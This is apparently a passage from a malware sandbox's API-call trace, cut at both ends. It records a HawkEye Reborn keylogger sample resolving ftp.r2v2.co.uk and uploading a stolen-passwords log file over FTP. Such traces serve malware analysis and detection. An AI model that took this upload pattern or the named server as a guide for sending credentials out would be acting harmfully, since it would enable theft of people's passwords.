(lpMutexAttributes=0x323fb64, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x4f8 [0140.652] GetLastError () returned 0x0 [0140.652] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0x1f4) returned 0x0 [0140.652] GetLastError () returned 0x0 [0140.652] ReleaseMutex (hMutex=0x4f8) returned 1 [0140.652] GetLastError () returned 0x0 [0140.652] CloseHandle (hObject=0x4f8) returned 1 [0140.652] GetLastError () returned 0x0 [0140.652] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x32401d8, cbSid=0xf2ebec | out: pSid=0x32401d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebec) returned 1 [0140.652] GetLastError () returned 0x0 [0140.652] CreateMutexW (lpMutexAttributes=0x32402e8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x4f8 [0140.652] GetLastError () returned 0x0 [0140.652] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0x1f4) returned 0x0 [0140.653] GetLastError () returned 0x0 [0140.653] ReleaseMutex (hMutex=0x4f8) returned 1 [0140.653] GetLastError () returned 0x0 [0140.653] CloseHandle (hObject=0x4f8) returned 1 [0140.653] GetLastError () returned 0x0 [0140.662] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f8 [0140.663] GetLastError () returned 0x0 [0140.663] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x504 [0140.663] GetLastError () returned 0x0 [0140.663] ioctlsocket (in: s=0x4f8, cmd=-2147195266, argp=0xf2ee38 | out: argp=0xf2ee38) returned 0 [0140.663] GetLastError () returned 0x0 [0140.663] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x508 [0140.663] GetLastError () returned 0x0 [0140.663] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x50c [0140.663] GetLastError () returned 0x0 [0140.664] ioctlsocket (in: s=0x508, cmd=-2147195266, argp=0xf2ee38 | out: argp=0xf2ee38) returned 0 [0140.664] GetLastError () returned 0x0 [0140.673] WSAIoctl (in: s=0x4f8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xf2ee1c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xf2ee1c, lpOverlapped=0x0) returned -1 [0140.674] GetLastError () returned 0x2733 [0140.675] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1271d60, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0140.686] GetLastError () returned 0x2733 [0140.686] WSAEventSelect (s=0x4f8, hEventObject=0x504, lNetworkEvents=512) returned 0 [0140.687] GetLastError () returned 0x0 [0140.687] WSAIoctl (in: s=0x508, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xf2ee1c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xf2ee1c, lpOverlapped=0x0) returned -1 [0140.687] GetLastError () returned 0x2733 [0140.687] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1271d60, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0140.687] GetLastError () returned 0x2733 [0140.688] WSAEventSelect (s=0x508, hEventObject=0x50c, lNetworkEvents=512) returned 0 [0140.688] GetLastError () returned 0x0 [0140.688] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x514 [0140.688] GetLastError () returned 0x0 [0140.688] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x514, param_3=0x3) returned 0x0 [0140.692] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xf2ee20 | out: phkResult=0xf2ee20*=0x52c) returned 0x0 [0140.692] GetLastError () returned 0x0 [0140.693] RegOpenKeyExW (in: hKey=0x52c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xf2eddc | out: phkResult=0xf2eddc*=0x530) returned 0x0 [0140.693] GetLastError () returned 0x0 [0140.693] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x534 [0140.693] GetLastError () returned 0x0 [0140.693] RegNotifyChangeKeyValue (hKey=0x530, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x534, fAsynchronous=1) returned 0x0 [0140.693] GetLastError () returned 0x0 [0140.694] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xf2eddc | out: phkResult=0xf2eddc*=0x538) returned 0x0 [0140.695] GetLastError () returned 0x0 [0140.695] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x53c [0140.695] GetLastError () returned 0x0 [0140.695] RegNotifyChangeKeyValue (hKey=0x538, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x53c, fAsynchronous=1) returned 0x0 [0140.695] GetLastError () returned 0x0 [0140.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xf2eddc | out: phkResult=0xf2eddc*=0x540) returned 0x0 [0140.695] GetLastError () returned 0x0 [0140.695] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x544 [0140.695] GetLastError () returned 0x0 [0140.695] RegNotifyChangeKeyValue (hKey=0x540, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x544, fAsynchronous=1) returned 0x0 [0140.695] GetLastError () returned 0x0 [0140.695] GetCurrentProcess () returned 0xffffffff [0140.695] GetLastError () returned 0x3f0 [0140.695] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2edc4 | out: TokenHandle=0xf2edc4*=0x548) returned 1 [0140.695] GetLastError () returned 0x3f0 [0140.698] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0xf2e634 | out: phkResult=0xf2e634*=0x54c) returned 0x0 [0140.698] RegQueryValueExW (in: hKey=0x54c, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0xf2e69c, lpData=0x0, lpcbData=0xf2e698*=0x0 | out: lpType=0xf2e69c*=0x0, lpData=0x0, lpcbData=0xf2e698*=0x0) returned 0x2 [0140.760] RegCloseKey (hKey=0x54c) returned 0x0 [0140.773] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x12df778 [0140.970] GetLastError () returned 0x0 [0140.972] WinHttpSetTimeouts (hInternet=0x12df778, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0140.972] GetLastError () returned 0x0 [0140.974] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1271d60 | out: pProxyConfig=0x1271d60) returned 1 [0141.107] GetLastError () returned 0x0 [0141.110] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xf2ed90*=0x514, lpdwindex=0xf2eb48 | out: lpdwindex=0xf2eb48) returned 0x80010115 [0141.111] CoGetContextToken (in: pToken=0xf2db54 | out: pToken=0xf2db54) returned 0x0 [0141.111] CoGetContextToken (in: pToken=0xf2db24 | out: pToken=0xf2db24) returned 0x0 [0141.111] CoGetContextToken (in: pToken=0xf2dab4 | out: pToken=0xf2dab4) returned 0x0 [0141.111] WbemLocator:IUnknown:Release (This=0x12b3510) returned 0x1 [0141.111] WbemLocator:IUnknown:Release (This=0x1281ef8) returned 0x0 [0141.111] CoGetContextToken (in: pToken=0xf2dab4 | out: pToken=0xf2dab4) returned 0x0 [0141.111] IUnknown:Release (This=0x12b2968) returned 0x1 [0141.111] CoGetContextToken (in: pToken=0xf2dab4 | out: pToken=0xf2dab4) returned 0x0 [0141.111] WbemLocator:IUnknown:Release (This=0x12b6640) returned 0x1 [0141.111] WbemLocator:IUnknown:Release (This=0x1282948) returned 0x0 [0141.111] CoGetContextToken (in: pToken=0xf2dab4 | out: pToken=0xf2dab4) returned 0x0 [0141.111] IUnknown:Release (This=0x12b2170) returned 0x1 [0141.112] CoGetContextToken (in: pToken=0xf2dab4 | out: pToken=0xf2dab4) returned 0x0 [0141.112] IUnknown:Release (This=0x12b27d0) returned 0x1 [0141.112] CoGetContextToken (in: pToken=0xf2dab4 | out: pToken=0xf2dab4) returned 0x0 [0141.112] IUnknown:Release (This=0x12b1fd8) returned 0x1 [0141.112] CoGetContextToken (in: pToken=0xf2dab4 | out: pToken=0xf2dab4) returned 0x0 [0141.112] IUnknown:Release (This=0x12b24a0) returned 0x1 [0141.112] CoGetContextToken (in: pToken=0xf2dab4 | out: pToken=0xf2dab4) returned 0x0 [0141.112] WbemStatusCodeText:IUnknown:Release (This=0x12b74c8) returned 0x1 [0141.112] WbemStatusCodeText:IUnknown:Release (This=0x12b74c8) returned 0x0 [0141.113] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xf2ed70*=0x504, lpdwindex=0xf2eb28 | out: lpdwindex=0xf2eb28) returned 0x80010115 [0141.114] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xf2ed70*=0x50c, lpdwindex=0xf2eb28 | out: lpdwindex=0xf2eb28) returned 0x80010115 [0141.114] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xf2edc4*=0x534, lpdwindex=0xf2eb7c | out: lpdwindex=0xf2eb7c) returned 0x80010115 [0141.114] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xf2edc4*=0x53c, lpdwindex=0xf2eb7c | out: lpdwindex=0xf2eb7c) returned 0x80010115 [0141.114] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xf2edc4*=0x544, lpdwindex=0xf2eb7c | out: lpdwindex=0xf2eb7c) returned 0x80010115 [0141.116] WinHttpGetProxyForUrl (in: hSession=0x12df778, lpcwszUrl="ftp://ftp.r2v2.co.uk/HawkEyeKeylogger-Rebornv8-PasswordsLogs-CIiHmnxMn6Ps-LHNIWSJ-16-10-2018-21-57.txt", pAutoProxyOptions=0x1271d60, pProxyInfo=0xf2edb4 | out: pProxyInfo=0xf2edb4) returned 0 [0141.133] GetLastError () returned 0x2f94 [0141.137] GetCurrentProcess () returned 0xffffffff [0141.137] GetLastError () returned 0x3f0 [0141.137] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ea38 | out: TokenHandle=0xf2ea38*=0x5bc) returned 1 [0141.137] GetLastError () returned 0x3f0 [0141.137] GetCurrentProcess () returned 0xffffffff [0141.137] GetLastError () returned 0x3f0 [0141.137] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ea48 | out: TokenHandle=0xf2ea48*=0x5c0) returned 1 [0141.137] GetLastError () returned 0x3f0 [0141.138] SetEvent (hEvent=0x454) returned 1 [0141.138] GetLastError () returned 0x3f0 [0141.160] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0xf2ed94 | out: pFixedInfo=0x0, pOutBufLen=0xf2ed94) returned 0x6f [0141.302] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x12e1660 [0141.302] GetLastError () returned 0x0 [0141.302] GetNetworkParams (in: pFixedInfo=0x12e1660, pOutBufLen=0xf2ed94 | out: pFixedInfo=0x12e1660, pOutBufLen=0xf2ed94) returned 0x0 [0141.322] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0141.322] GetLastError () returned 0x0 [0141.325] LocalFree (hMem=0x12e1660) returned 0x0 [0141.325] GetLastError () returned 0x0 [0141.325] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=1048576, lpName=0x0) returned 0x5fc [0141.326] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5d8 [0141.326] GetLastError () returned 0x0 [0141.326] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x604 [0141.326] GetLastError () returned 0x0 [0141.326] SetEvent (hEvent=0x454) returned 1 [0141.327] GetLastError () returned 0x0 [0141.327] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x182dc, cHandles=0x3, pHandles=0xf2ed40*=0x5fc, lpdwindex=0xf2ebac | out: lpdwindex=0xf2ebac) returned 0x0 [0141.330] ReleaseMutex (hMutex=0x604) returned 1 [0141.330] GetLastError () returned 0x0 [0141.330] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x600 [0141.330] GetLastError () returned 0x0 [0141.330] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x608 [0141.331] GetLastError () returned 0x0 [0141.334] getaddrinfo (in: pNodeName="ftp.r2v2.co.uk", pServiceName=0x0, pHints=0xf2eca4*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xf2ea38 | out: ppResult=0xf2ea38*=0x12d5328*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ftp.r2v2.co.uk", ai_addr=0x1290e18*(sa_family=2, sin_port=0x0, sin_addr="216.37.42.30"), ai_next=0x0)) returned 0 [0141.480] GetLastError () returned 0x0 [0141.481] FreeAddrInfoW (pAddrInfo=0x12d5328*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="瑦⹰㉲㉶挮⹯歵", ai_addr=0x1290e18*(sa_family=2, sin_port=0x0, sin_addr="216.37.42.30"), ai_next=0x0)) [0141.481] GetLastError () returned 0x0 [0141.481] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x60c [0141.481] GetLastError () returned 0x0 [0141.481] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x61c [0141.481] GetLastError () returned 0x0 [0141.481] ioctlsocket (in: s=0x60c, cmd=-2147195266, argp=0xf2ec88 | out: argp=0xf2ec88) returned 0 [0141.482] GetLastError () returned 0x0 [0141.482] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x620 [0141.482] GetLastError () returned 0x0 [0141.482] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x624 [0141.482] GetLastError () returned 0x0 [0141.482] ioctlsocket (in: s=0x620, cmd=-2147195266, argp=0xf2ec88 | out: argp=0xf2ec88) returned 0 [0141.482] GetLastError () returned 0x0 [0141.482] WSAIoctl (in: s=0x60c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xf2ec6c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xf2ec6c, lpOverlapped=0x0) returned -1 [0141.482] GetLastError () returned 0x2733 [0141.482] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1271d60, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0141.482] GetLastError () returned 0x2733 [0141.482] WSAEventSelect (s=0x60c, hEventObject=0x61c, lNetworkEvents=512) returned 0 [0141.482] GetLastError () returned 0x0 [0141.482] WSAIoctl (in: s=0x620, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xf2ec6c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xf2ec6c, lpOverlapped=0x0) returned -1 [0141.482] GetLastError () returned 0x2733 [0141.482] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1271d60, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0141.482] GetLastError () returned 0x2733 [0141.482] WSAEventSelect (s=0x620, hEventObject=0x624, lNetworkEvents=512) returned 0 [0141.483] GetLastError () returned 0x0 [0141.486] GetAdaptersAddresses () returned 0x6f [0141.488] LocalAlloc (uFlags=0x0, uBytes=0xa8c) returned 0x12eeee0 [0141.488] GetLastError () returned 0x0 [0141.488] GetAdaptersAddresses () returned 0x0 [0141.494] LocalFree (hMem=0x12eeee0) returned 0x0 [0141.494] GetLastError () returned 0x0 [0141.498] WSAConnect (in: s=0x600, name=0x3257268*(sa_family=2, sin_port=0x15, sin_addr="216.37.42.30"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0141.649] GetLastError () returned 0x0 [0141.650] closesocket (s=0x608) returned 0 [0141.650] GetLastError () returned 0x0 [0141.651] setsockopt (s=0x600, level=65535, optname=4101, optval="\xe8\x80\x01", optlen=4) returned 0 [0141.651] GetLastError () returned 0x0 [0141.651] setsockopt (s=0x600, level=65535, optname=4102, optval="\xe8\x80\x01", optlen=4) returned 0 [0141.651] GetLastError () returned 0x0 [0141.655] recv (in: s=0x600, buf=0x3258910, len=1024, flags=0 | out: buf=0x3258910*) returned 320 [0141.917] GetLastError () returned 0x0 [0142.102] send (in: s=0x600, buf=0x3259cbc*, len=23, flags=0 | out: buf=0x3259cbc*) returned 23 [0142.102] GetLastError () returned 0x0 [0142.102] recv (in: s=0x600, buf=0x3259d78, len=1024, flags=0 | out: buf=0x3259d78*) returned 49 [0142.324] GetLastError () returned 0x0 [0142.324] send (in: s=0x600, buf=0x325a39c*, len=19, flags=0 | out: buf=0x325a39c*) returned 19 [0142.324] GetLastError () returned 0x0 [0142.324] recv (in: s=0x600, buf=0x325a438, len=1024, flags=0 | out: buf=0x325a438*) returned 43 [0142.801] GetLastError () returned 0x0 [0142.801] send (in: s=0x600, buf=0x325aaf0*, len=14, flags=0 | out: buf=0x325aaf0*) returned 14 [0142.801] GetLastError () returned 0x0 [0142.801] recv (in: s=0x600, buf=0x325ab88, len=1024, flags=0 | out: buf=0x325ab88*) returned 23 [0143.030] GetLastError () returned 0x0 [0143.030] send (in: s=0x600, buf=0x325b0f4*, len=5, flags=0 | out: buf=0x325b0f4*) returned 5 [0143.031] GetLastError () returned 0x0 [0143.031] recv (in: s=0x600, buf=0x325b184, len=1024, flags=0 | out: buf=0x325b184*) returned 34 [0143.171] GetLastError () returned 0x0 [0143.171] send (in: s=0x600, buf=0x325b730*, len=7, flags=0 | out: buf=0x325b730*) returned 7 [0143.172] GetLastError () returned 0x0 [0143.172] recv (in: s=0x600, buf=0x325b7c0, len=1024, flags=0 | out: buf=0x325b7c0*) returned 32 [0143.309] GetLastError () returned 0x0 [0143.309] send (in: s=0x600, buf=0x325bd48*, len=8, flags=0 | out: buf=0x325bd48*) returned 8 [0143.309] GetLastError () returned 0x0 [0143.309] recv (in: s=0x600, buf=0x325bdd8, len=1024, flags=0 | out: buf=0x325bdd8*) returned 30 [0143.447] GetLastError () returned 0x0 [0143.447] send (in: s=0x600, buf=0x325c350*, len=6, flags=0 | out: buf=0x325c350*) returned 6 [0143.447] GetLastError () returned 0x0 [0143.447] recv (in: s=0x600, buf=0x325c3e0, len=1024, flags=0 | out: buf=0x325c3e0*) returned 49 [0143.584] GetLastError () returned 0x0 [0143.920] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x608 [0143.920] GetLastError () returned 0x0 [0144.041] getsockname (in: s=0x600, name=0x325d0d4, namelen=0x325d0bc | out: name=0x325d0d4*(sa_family=2, sin_port=0xc114, sin_addr="192.168.0.51"), namelen=0x325d0bc) returned 0 [0144.041] GetLastError () returned 0x0 [0144.042] bind (s=0x608, addr=0x325d2b0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.51"), namelen=16) returned 0 [0144.042] GetLastError () returned 0x0 [0144.042] WSAConnect (in: s=0x608, name=0x325d370*(sa_family=2, sin_port=0xd850, sin_addr="216.37.42.30"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0144.179] GetLastError () returned 0x0 [0144.179] send (in: s=0x600, buf=0x325d4fc*, len=88, flags=0 | out: buf=0x325d4fc*) returned 88 [0144.180] GetLastError () returned 0x0 [0144.180] recv (in: s=0x600, buf=0x325d5dc, len=1024, flags=0 | out: buf=0x325d5dc*) returned 30 [0144.322] GetLastError () returned 0x0 [0144.323] setsockopt (s=0x608, level=65535, optname=4101, optval="\xe0\x93\x04", optlen=4) returned 0 [0144.323] GetLastError () returned 0x0 [0144.323] setsockopt (s=0x608, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0144.323] GetLastError () returned 0x0 [0144.323] send (in: s=0x608, buf=0x31ed274*, len=535, flags=0 | out: buf=0x31ed274*) returned 535 [0144.324] GetLastError () returned 0x0 [0144.325] shutdown (s=0x608, how=2) returned 0 [0144.325] GetLastError () returned 0x0 [0144.326] closesocket (s=0x608) returned 0 [0144.326] GetLastError () returned 0x0 [0144.326] recv (in: s=0x600, buf=0x325dc48, len=1024, flags=0 | out: buf=0x325dc48*) returned 94 [0144.464] GetLastError () returned 0x0 [0144.466] ReleaseSemaphore (in: hSemaphore=0x5fc, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0144.530] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc15e [0144.531] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc15d [0144.532] GetSystemMetrics (nIndex=75) returned 1 [0144.551] GetStockObject (i=5) returned 0x1900015 [0144.551] GetLastError () returned 0x0 [0144.552] GetModuleHandleW (lpModuleName=0x0) returned 0xd10000 [0144.552] CoTaskMemAlloc (cb=0x4c) returned 0x12eae40 [0144.552] RegisterClassW (lpWndClass=0x1271d78) returned 0xc16e [0144.552] GetLastError () returned 0x0 [0144.552] CoTaskMemFree (pv=0x12eae40) [0144.553] GetModuleHandleW (lpModuleName=0x0) returned 0xd10000 [0144.553] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.378734a", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xd10000, lpParam=0x0) returned 0x140212 [0144.553] SetWindowLongW (hWnd=0x140212, nIndex=-4, dwNewLong=2007026336) returned 48697618 [0144.553] GetWindowLongW (hWnd=0x140212, nIndex=-4) returned 2007026336 [0144.553] SetWindowLongW (hWnd=0x140212, nIndex=-4, dwNewLong=48697666) returned 2007026336 [0144.554] GetWindowLongW (hWnd=0x140212, nIndex=-4) returned 48697666 [0144.554] GetWindowLongW (hWnd=0x140212, nIndex=-16) returned 113311744 [0144.554] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc16f [0144.554] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x140212, Msg=0x24, wParam=0x0, lParam=0xf2e8dc) returned 0x0 [0144.554] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x140212, Msg=0x81, wParam=0x0, lParam=0xf2e8d0) returned 0x1 [0144.555] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x140212, Msg=0x83, wParam=0x0, lParam=0xf2e8bc) returned 0x0 [0144.555] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x140212, Msg=0x1, wParam=0x0, lParam=0xf2e8d0) returned 0x0 [0144.555] GetClientRect (in: hWnd=0x140212, lpRect=0xf2e610 | out: lpRect=0xf2e610) returned 1 [0144.555] GetWindowRect (in: hWnd=0x140212, lpRect=0xf2e610 | out: lpRect=0xf2e610) returned 1 [0144.555] GetLastError () returned 0x6 [0144.556] GetParent (hWnd=0x140212) returned 0x0 [0144.557] OleInitialize (pvReserved=0x0) returned 0x0 [0144.557] GetLastError () returned 0x6 [0144.557] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0xf2efb0 | out: lplpMessageFilter=0xf2efb0*=0x0) returned 0x0 [0144.559] PeekMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0xf2ef88) returned 1 [0144.560] IsWindowUnicode (hWnd=0x80084) returned 1 [0144.562] GetMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf2ef88) returned 1 [0144.563] TranslateMessage (lpMsg=0xf2ef88) returned 0 [0144.563] DispatchMessageW (lpMsg=0xf2ef88) returned 0x0 [0144.564] PeekMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0xf2ef88) returned 1 [0144.564] IsWindowUnicode (hWnd=0x8003a) returned 1 [0144.564] GetMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf2ef88) returned 1 [0144.564] TranslateMessage (lpMsg=0xf2ef88) returned 0 [0144.564] DispatchMessageW (lpMsg=0xf2ef88) returned 0x0 [0144.564] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x8003a, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0144.564] PeekMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0xf2ef88) returned 1 [0144.565] IsWindowUnicode (hWnd=0x80084) returned 1 [0144.565] GetMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf2ef88) returned 1 [0144.565] TranslateMessage (lpMsg=0xf2ef88) returned 0 [0144.565] DispatchMessageW (lpMsg=0xf2ef88) returned 0x0 [0144.566] PeekMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0xf2ef88) returned 1 [0144.567] IsWindowUnicode (hWnd=0x7005c) returned 1 [0144.567] GetMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf2ef88) returned 1 [0144.567] TranslateMessage (lpMsg=0xf2ef88) returned 0 [0144.567] DispatchMessageW (lpMsg=0xf2ef88) returned 0x1 [0144.567] CoGetContextToken (in: pToken=0xf2e064 | out: pToken=0xf2e064) returned 0x0 [0144.567] CoGetContextToken (in: pToken=0xf2e030 | out: pToken=0xf2e030) returned 0x0 [0144.567] WbemLocator:IUnknown:Release (This=0x12b4be0) returned 0x1 [0144.567] IUnknown:Release (This=0x12b4ee0) returned 0x0 [0144.569] PeekMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0xf2ef88) returned 1 [0144.569] IsWindowUnicode (hWnd=0x7005c) returned 1 [0144.569] GetMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf2ef88) returned 1 [0144.569] TranslateMessage (lpMsg=0xf2ef88) returned 0 [0144.569] DispatchMessageW (lpMsg=0xf2ef88) returned 0x1 [0144.569] CoGetContextToken (in: pToken=0xf2e064 | out: pToken=0xf2e064) returned 0x0 [0144.569] CoGetContextToken (in: pToken=0xf2e030 | out: pToken=0xf2e030) returned 0x0 [0144.569] WbemLocator:IUnknown:Release (This=0x12b6140) returned 0x1 [0144.569] IUnknown:Release (This=0x12b84f0) returned 0x0 [0144.583] PeekMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0xf2ef88) returned 0 [0144.595] PeekMessageW (in: lpMsg=0xf2ef88, hWnd=0x0, 